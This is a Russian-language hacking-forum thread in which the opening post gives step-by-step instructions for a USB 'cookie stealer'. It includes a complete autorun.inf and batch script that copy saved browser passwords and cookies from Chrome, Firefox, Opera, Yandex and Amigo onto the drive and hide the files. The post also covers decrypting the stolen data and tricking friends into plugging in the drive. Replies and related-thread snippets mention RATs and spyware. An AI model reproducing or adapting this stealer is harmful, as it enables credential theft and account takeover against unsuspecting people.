Создаём флешку с cookie - стиллером.

Fancy Bear

Telegram аккаунты + premium | tg:@HXP69
Подтвержденный
Заблокирован
Сообщения
179
Реакции
293
a313eb2a34baf23506c31.png

Стиллер ворует cookie с браузера и с помощью специальной программы расшифровывает их. На выходе вы получаете готовые пароли. Для тех кто в бункере: сookie-файлы – зашифрованные текстовые документы, в которых хранится основная информация о пользователе, который использует браузер. В эту информацию входит статистика использования браузера, персональные настройки, сохранённые логины и пароли, а также многое другое.


Плюсы и минусы способа​



Минусы:

Есть смысл стиллить куки только тогда, когда вы уверены, что жертва сохраняет пароли в браузере.

Несовместимость с WINDOWS 10, и последними версиями семёрки

Плюсы:

Метод не палится антивирусом.

Кто бы что ни говорил, а человека взломать легче, чем компьютер. Предлогов может быть море. Попросить друга прийти к нему с флешкой, и скачать музыку и тд.



Инструкция:​

1. Создаём на флешке 2 текстовых файла. Первый называем “autorun.inf” а второй – “stealer.bat” *.bat - исполняемое расширение файла. То есть его можно использовать как программу.

В первый прописываем такие строчки:

[AutoRun]Open=”stealer.bat”
Первый файл отвечает за автозапуск стиллера.
Второй непосредственно сам стиллер. Его следует наполнить такими строчками:

@Echo off
md %~d0\Mozilla
md %~d0\0pera
md %~d0\Google
md %~d0\Yandex
md %~d0\Amigo
CD/D %APPDATA%\Opera\Opera\
cls
copy /y wand.dat %~d0\Opera\
copy /y cookies.dat %~d0\Opera\
cd %AppData%\Mozilla\Firefox\Profiles\*.default
copy /y cookies.sqlite %~d0\Mozilla
copy /y key3.db %~d0\Mozilla
copy /y signons.sqlite %~d0\Mozilla
copy /y %AppData%\Mozilla\Firefox\Profiles\*.default %~d0\Mozilla
cd %localappdata%\Google\Chrome\User Data\Default
cls
copy /y "%localappdata%\Google\Chrome\User Data\Default\Login Data" "%~d0\Google"
cd %localappdata%\Yandex\YandexBrowser\User Data\Default
copy /y "%localappdata%\Yandex\YandexBrowser\User Data\Default\Login Data" "%~d0\Yandex"
cd %localappdata%\Amigo\User Data\Default
copy /y "%localappdata%\Amigo\User Data\Default\Login Data" "%~d0\Amigo"
cls
ATTRIB -R -A -S -H
attrib +h %~d0\Mozilla
attrib +h %~d0\Opera
attrib +h %~d0\Google
attrib +h %~d0\Yandex
attrib +h %~d0\Amigo
attrib +h %~d0\search.bat
attrib +h %~d0\new
attrib +h %~d0\autorun.inf
del: autorun.inf?


2. После этого "скрываем" получившиеся файлы, и можем идти стиллить пароли и после того, как операция выполнена успешно - возвращаемся домой, через "Панель управления->Оформление и персонализация->Показ скрытых папок и файлов" отображаем скрытые на флешке файлы.

Свои куки на своём компьютере удаляем, или скидываем на флешку. А на их место копируем полученные.

3. Теперь Скачиваем (пароль от архива: wbpv28821@). Лично я использовал портативную версию. В этой программе уже ничего не надо нажимать - она сама загрузит и расшифрует куки из ваших браузеров. Напоминаю, не забудьте заменить свои файлы на полученные!

204d50c552a87dbe8ea75.png

Возвращаясь к минусам, описанным выше следует решить какой способ стиллинга использовать. Если у жертвы стоит последняя версия винды семёрки, или вообще десятка, тогда стиллинг лучше всего осуществлять вручную. То есть надо прийти к жертве домой, естественно заранее придумав предлог, подключить флешку к ПК, и запустить батник вручную.

|

С уважением
@Fancy Bear
 
Последнее редактирование:
По-любому это спалит любой антивирусник. Абсолютно любой, даже Windows Defender.
И механизм не особо понятен - это надо физически прийти, воткнуть флешку, запустить батник. Сразу всё будет понятно, откуда ноги растут.
Сейчас уже не так чтобы много у кого семёрка осталась.
Короче отличный способ в пятак получить от друзей.
 
Удобно, раньше пользовался подобным, только готовыми вариантами. Вытягивало все успешно, буквально за минутку.

Хотя, если есть физический доступ, rat-ник закидываешь, и потом что хочешь накатываешь, не выходя из дома.

Но сейчас мб всё иначе, в бородатые годы таким занимался)
 
че порно сайты теперь не смотреть?
Да кто ж тебе запретит. Не хочешь стиллер - смотри проверенные. Порнхаб вряд ли будет стиллаки закидывать или Иксхамстер какой-нибудь.
 

Похожие темы

Простой стилер паролей из флешки ========================== Прикреплённый файл нужно пересохранить в .bat формате (Это обязательно) Форматируем любую вашу флешку и кидаем туда .bat файл Потом нам нужно иметь физический доступ к компьютеру жертвы. Подключаем флешку , запускаем stealer.bat .Этот...
Ответы
12
Просмотры
[/SPOILER] XFiles Spyware - это шпион с огромным функционалом предназначенный для слежки и управления своими целями, способен удивить своей простой и удобством использования, рассчитанный как на одного так и на огромную команду.
Ответы
54
Просмотры
10К
Итак, продолжаем рассказ про проникновение в чужие корпоративные сети и чем там можно заняться. Я решил недоговорки и купюры в опубликованной ранее статье сделать предметом вебинара только для приглашённых, ибо страницы сего почтенного форума наверняка посещают краснопузые, и не хотелось бы их...
Ответы
44
Просмотры
14К
Назад
Сверху Снизу